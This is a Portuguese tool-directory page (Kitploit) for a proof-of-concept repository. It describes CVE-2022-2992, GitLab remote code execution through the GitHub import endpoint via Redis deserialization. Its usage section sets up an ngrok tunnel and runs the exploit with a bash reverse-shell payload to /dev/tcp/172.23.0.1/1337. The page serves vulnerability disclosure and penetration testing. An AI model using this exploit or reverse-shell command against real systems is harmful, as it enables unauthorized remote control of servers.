Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVEs — Uma coleção de scripts de prova de conceito para exploração de vulnerabilidades, escritos pela equipe da Redway Security para diversos CVEs. | Kitploit
Ferramentas/GitHubGitHub/redwaysecurity/cves
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubredwaysecurity/cves

CVEs

Uma coleção de scripts de prova de conceito para exploração de vulnerabilidades, escritos pela equipe da Redway Security para diversos CVEs.

Ver Repositório
2236há 9h 18mAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-2992: Execução Remota de Comandos via importação do Github

Informações

Descrição: Isso permite que um usuário autenticado obtenha execução remota de código por meio do endpoint Import from GitHub da API.
Versões Afetadas: todas as versões de 11.10 anteriores à 15.1.6, 15.2 a 15.2.4, 15.3 a 15.3.2
Versão Corrigida: 15.3.2
Pesquisador: vakzz
Link do Write-up: https://blog.redwaysecurity.com/2023/04/desenvolvendo-o-exploit-para-o-cve-2022.html
Link NIST CVE: https://nvd.nist.gov/vuln/detail/CVE-2022-2992

Exploit de Prova de Conceito

Descrição

Um usuário autenticado pode importar um repositório do Github para o Gitlab. É possível tentar importar de um servidor controlado pelo atacante que responde com um objeto do protocolo de serialização do Redis no campo aninhado default_branch, fazendo com que o Gitlab armazene esse objeto em cache no Redis e o Redis o desserialize e acione a execução do payload.

Uso/Exploração

Será necessário um token de acesso pessoal

$ bundle install # install dependencies
$ ngrok http 127.0.0.1:4567  # start ngrok tunnel
$ export NGROK_URL=https://68b9-83-173-213-121.eu.ngrok.io # use the url from ngrok
$ ruby exploit.rb http://target.gitlab.com w4dg6wVj7j7xlJgpGLEYdwFe 'bash -c "sh -i >& /dev/tcp/172.23.0.1/1337 0>&1"' # that is a example, use your own payload

Exemplo

Execução Remota de Comandos via importação do Github

Baixar ferramenta